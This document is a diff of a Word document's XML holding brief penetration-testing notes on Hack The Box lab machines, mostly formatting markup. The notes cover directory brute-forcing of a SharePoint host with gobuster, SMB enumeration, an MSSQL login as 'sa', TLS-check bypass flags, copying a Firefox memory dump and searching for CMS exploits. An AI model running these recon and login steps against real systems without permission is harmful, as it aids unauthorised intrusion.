-        <w:t>-wpscan https issue, add --disable-tls-checks to the wpscan command</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">-curl https issue, add -k parameter to the command </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">-CipherText length = ClearText length, we can think about One Time Pad like vegenere </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">Link to help for decryption  </w:t>
       </w:r>
       <w:hyperlink r:id="rId63">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel20"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+          </w:rPr>
+          <w:t>http://10.10.10.59/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:hyperlink r:id="rId64">
+        <w:bookmarkStart w:id="13" w:name="__DdeLink__1641_2103019221"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ListLabel20"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+          </w:rPr>
+          <w:t>_layouts/viewlsts.aspx</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://10.10.10.59 -o sharepoint_report.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>-Check result of smbmap after scanning, if access is denied, then try later with a valid user account.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>-Connexion to MSSQL database</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>*DBeaver</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="SourceText"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>sqsh -S 10.10.10.59 -U sa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:jc w:val="center"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>HacktheBox Brainfuck (Linux)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-When https is allow, check the DNS in sslscan and add them in the /etc/hosts file </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>-wpscan https issue, add --disable-tls-checks to the wpscan command</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">-curl https issue, add -k parameter to the command </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">-CipherText length = ClearText length, we can think about One Time Pad like vegenere </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Link to help for decryption  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId65">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ListLabel3"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://rumkin.com/tools/cipher/otp.php</w:t>
         </w:r>
@@ -19714,8 +21836,8 @@
         </w:rPr>
         <w:t xml:space="preserve">Ex: </w:t>
       </w:r>
-      <w:bookmarkStart w:id="13" w:name="d437"/>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkStart w:id="14" w:name="d437"/>
+      <w:bookmarkEnd w:id="14"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -20088,7 +22210,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId64"/>
+                    <a:blip r:embed="rId66"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -20231,29 +22353,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve">*cmd /c "copy firefox.exe_200131_084937.dmp </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId65">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="StrongEmphasis"/>
-            <w:b w:val="false"/>
-            <w:bCs w:val="false"/>
-            <w:highlight w:val="yellow"/>
-            <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-          </w:rPr>
-          <w:t>x:\</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>"</w:t>
+        <w:t>*cmd /c "copy firefox.exe_200131_084937.dmp x:\"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20619,10 +22719,10 @@
         </w:rPr>
         <w:t xml:space="preserve">curl </w:t>
       </w:r>
-      <w:hyperlink r:id="rId66">
+      <w:hyperlink r:id="rId67">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="StrongEmphasis"/>
+            <w:rStyle w:val="ListLabel21"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
             <w:highlight w:val="yellow"/>
@@ -20658,8 +22758,8 @@
         <w:jc w:val="center"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="__DdeLink__1423_2732123130"/>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkStart w:id="15" w:name="__DdeLink__1423_2732123130"/>
+      <w:bookmarkEnd w:id="15"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -20712,8 +22812,8 @@
         <w:pStyle w:val="Normal"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="__DdeLink__1423_27321231301"/>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkStart w:id="16" w:name="__DdeLink__1423_27321231301"/>
+      <w:bookmarkEnd w:id="16"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -20829,10 +22929,10 @@
         </w:rPr>
         <w:t xml:space="preserve">more </w:t>
       </w:r>
-      <w:hyperlink r:id="rId67">
+      <w:hyperlink r:id="rId68">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="StrongEmphasis"/>
+            <w:rStyle w:val="ListLabel22"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -20917,7 +23017,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId68"/>
+                    <a:blip r:embed="rId69"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -20993,7 +23093,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId69"/>
+                    <a:blip r:embed="rId70"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -21236,7 +23336,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId70"/>
+                    <a:blip r:embed="rId71"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -22075,7 +24175,7 @@
         <w:pStyle w:val="Normal"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="__DdeLink__2967_2688823153"/>
+      <w:bookmarkStart w:id="17" w:name="__DdeLink__2967_2688823153"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
@@ -22090,7 +24190,7 @@
         </w:rPr>
         <w:t xml:space="preserve">-CMS exploit: searchsploit on plugin, forum, blog </w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -22190,7 +24290,16 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -22213,37 +24322,7 @@
           <w:u w:val="single"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t xml:space="preserve">HacktheBox </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>TartaSauce</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Linux)</w:t>
+        <w:t>HacktheBox TartaSauce (Linux)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22263,166 +24342,97 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+        <w:t>-We can edit the response body / header in burpsuite so that the result change in output</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-compile c code in 64bit machine for 32 : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>gcc -m32 file mycfile.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-if it falls, run </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>apt-get install gcc-multilib g++-multilib</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>We can edit the response body / header in burpsuite so that the result change in output</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ompile c code in 64bit machine for 32 : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>gcc -m32 file mycfile.c</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>-if it falls, r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">un </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>apt-get install gcc-multilib g++-multilib</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
         <w:tab/>
         <w:tab/>
       </w:r>
@@ -22460,7 +24470,9 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
+      <w:kinsoku w:val="true"/>
       <w:overflowPunct w:val="false"/>
+      <w:autoSpaceDE w:val="true"/>
       <w:bidi w:val="0"/>
       <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
       <w:jc w:val="left"/>
@@ -22480,6 +24492,10 @@
     <w:next w:val="TextBody"/>
     <w:qFormat/>
     <w:pPr>
+      <w:numPr>
+        <w:ilvl w:val="0"/>
+        <w:numId w:val="0"/>
+      </w:numPr>
       <w:spacing w:before="240" w:after="120"/>
       <w:outlineLvl w:val="0"/>
     </w:pPr>
@@ -22504,7 +24520,7 @@
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:styleId="InternetLink">
-    <w:name w:val="Internet Link"/>
+    <w:name w:val="Hyperlink"/>
     <w:rPr>
       <w:color w:val="000080"/>
       <w:u w:val="single"/>
